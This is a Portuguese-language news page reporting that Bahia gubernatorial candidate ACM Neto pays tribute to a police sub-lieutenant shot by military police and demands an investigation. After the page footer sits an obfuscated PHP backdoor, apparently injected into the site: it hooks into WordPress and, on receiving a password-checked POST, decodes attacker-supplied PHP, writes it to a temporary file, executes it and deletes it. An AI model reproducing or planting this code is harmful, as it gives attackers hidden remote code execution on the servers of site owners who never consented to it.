• SEJA BEM-VINDO

ACM Neto homenageia subtenente morto: ‘Não vamos aceitar que a impunidade prevaleça’

Publicado em: 30/09/2022 Atualizado:: setembro 30, 2022

 

“Todas as explicações que vieram à tona até agora não são convincentes”

 

O candidato a governador ACM Neto (União Brasil) afirmou na noite desta quinta-feira (29), em São Sebastião do Passé, que vai continuar cobrando explicações das autoridades estaduais sobre o “brutal assassinato” do subtenente Alves. “Todas as explicações que vieram à tona até agora não são convincentes. Pelo contrário. Nós não vamos aceitar que a impunidade prevaleça. Nós queremos e vamos buscar justiça”, afirmou o ex-prefeito de Salvador.

 

O subtenente Alberto Alves dos Santos, que colaborava com a segurança da equipe do candidato, foi morto a tiros por integrantes da Polícia Militar, em uma pousada de Itajuípe, no final da noite da última terça-feira (27). O sargento D’Almeida, que estava no mesmo quarto do subtenente e também foi atingido por tiros disparados por policiais, afirmou que Alves estava dormindo quando foi morto.

 

“Quero dizer que, com certeza, ontem foi o dia mais triste de toda essa campanha. E quando a gente vê uma pessoa como ele, um pai de família, um policial exemplar ser brutalmente assassinado, é aí que a gente dá mais valor à vida. E eu falo em dar valor à vida porque nós estamos em um meio que, infelizmente, a vontade de ter o poder mexe com a cabeça das pessoas. A vontade de ter o poder altera princípios, valores, relações e histórias. Mas, comigo, é diferente. Por isso mesmo quero prestar uma homenagem ao subtenente Alves e a toda a minha equipe de trabalho. Quero agradecer a cada um de nossos colaboradores que têm dedicado as suas vidas a esse propósito de transformar a Bahia”.

 

Ministério da Justiça

 

Na tarde desta quinta-feira, a coligação Pra Mudar a Bahia ingressou com uma petição do Ministério da Justiça solicitando que a Polícia Federal investigue as causas da morte do subtenente Alves.

 

……………………….

 

Fonte: Bahia.ba

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}